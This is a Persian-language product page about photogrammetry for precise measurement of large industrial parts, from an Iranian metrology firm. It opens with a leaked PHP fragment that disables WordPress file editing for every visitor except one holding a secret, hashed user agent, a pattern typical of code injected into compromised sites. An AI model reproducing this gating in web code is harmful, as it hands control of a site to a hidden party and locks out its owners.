if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } ob_start(); ?> Photogrammetry | آرمان سنجش گستر

اطلاعات فتوگرامتری  

    Data Sheet

جـهـت کنترل خـطا بـرای قطعـات بـزرگ وتطابـق سریع و دقیق اندازه برداری های مجزا در عملیات اسکن ابعادی بکار گرفته می شود، که این امر به صورت ترکیب با دستگاه اسکن باعث افـزایش دقـت تا 15 میکـرون در هر متر خـواهد شد. همـانگـونه که گفته شد جهـت انجام فتوگرامتری از مارکرهای کد دار جهت انتقال اطلاعات قطعه به نرم افزار استفاده شده و هـمچنین از مارکر بـدون کد جـهت اسکـن قـطعه بـعد از فتوگرامتری استفاده می شـود  که پس از آمـاده سازی قطعه مربوطه از 2 عدد scale bar جهت معرفی مقیاس قطعه و 1 عدد cross جهت تعریف موقعیت X,Y,Z قطعه استفاده می شود سپس  توسط یک دوربین  مخصوص  ازتمام نقاط قطعه عکس برداری خواهد شد.

لازم به تـوضیح است که پس از گرفتـن  کلیه عکس ها و انتقال به  کامپیوتر، نرم افزار فتوگرامتری عکس های مذکور را پردازش کرده و  برای هر یک از مارکر های بدون کد یک موقعیت X,Y,Z محاسبه  می گردد.

لازم به تـوضیح است که پس از گرفتـن  کلیه عکس ها و انتقال به  کامپیوتر، نرم افزار فتوگرامتری عکس های مذکور را پردازش کرده و  برای هر یک از مارکر های بدون کد یک موقعیت X,Y,Z محاسبه  می گردد.

مزایا و قابلیت های استفاده از فتوگرامتری

 امکان اندازه‌برداری قطعات دقیق با دقت 15 میکرون بر واحد متر

 امکان اندازه‌برداری قطعات با ابعاد بزرگ با دقت بالا

 امکان هم خط سازی مجموعه‌های بزرگ بر اساس اندازه‌گیری صفحات و محورهای مرجع به صورت دقیق

 استفاده در مونتاژ مجموعه‌های صنعتی بزرگ و همچنین برداشت اطلاعات ابعادی چگونگی هم خطی ادوات و قطعات مختلف در خط تولید و یا مجموعه‌های اسمبلی